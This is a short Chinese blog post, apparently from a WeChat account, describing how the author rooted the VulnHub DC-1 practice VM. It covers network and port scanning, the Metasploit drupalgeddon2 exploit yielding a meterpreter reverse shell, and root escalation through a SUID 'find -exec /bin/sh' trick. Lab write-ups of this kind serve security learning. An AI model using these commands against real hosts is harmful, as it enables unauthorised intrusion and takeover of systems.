这个十一假期比较懒,假期最后一天的下午才赶了一篇blog,实践的是vulnhub的dc1镜像,
下载地址,https://download.vulnhub.com/dc/DC-1.zip,
workstation导入启动就能获取到地址,省的换virtualbox了,
当然workstation导入启动就能获取到地址这个事儿是通过地址扫描确认的,sudo netdiscover -r 192.168.137.0/24,拿到了靶机地址192.168.137.11,
接着做端口扫描,sudo nmap -sS -sV -T4 -A -p- 192.168.137.11,
发现存在Drupal应用,就直接上metasploit里搜利用吧,
msfconsole,search drupal,
这里选择了exploit/unix/webapp/drupal_drupalgeddon2进行攻击,为啥直接选这个,是参考了别人的writeup,说试了前两个没反应,我也就不浪费那个时间再验证一遍了,最近确实比较懒,哈哈,
use exploit/unix/webapp/drupal_drupalgeddon2,
show options,查看一下还需要设置哪些参数,
set RHOSTS 192.168.137.11,就设置个靶机地址即可,
exploit,
这就轻松的拿到meterpreter反弹shell了,
getuid,发现不是root,接下来就想办法提权,
shell,python -c 'import pty; pty.spawn("/bin/bash")',
先转成可交互的shell,再查找一下有哪些有root权限的程序,
find / -perm -u=s -type f 2>/dev/null,
find的这个程序非常好,随便找一个可读的文件吧,重新弹一个shell出来,
/usr/bin/find /var/www/COPYRIGHT.txt -exec /bin/sh ;
至此拿root权限成功。
本文始发于微信公众号(云计算和网络安全技术实践):vulnhub之dc1的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论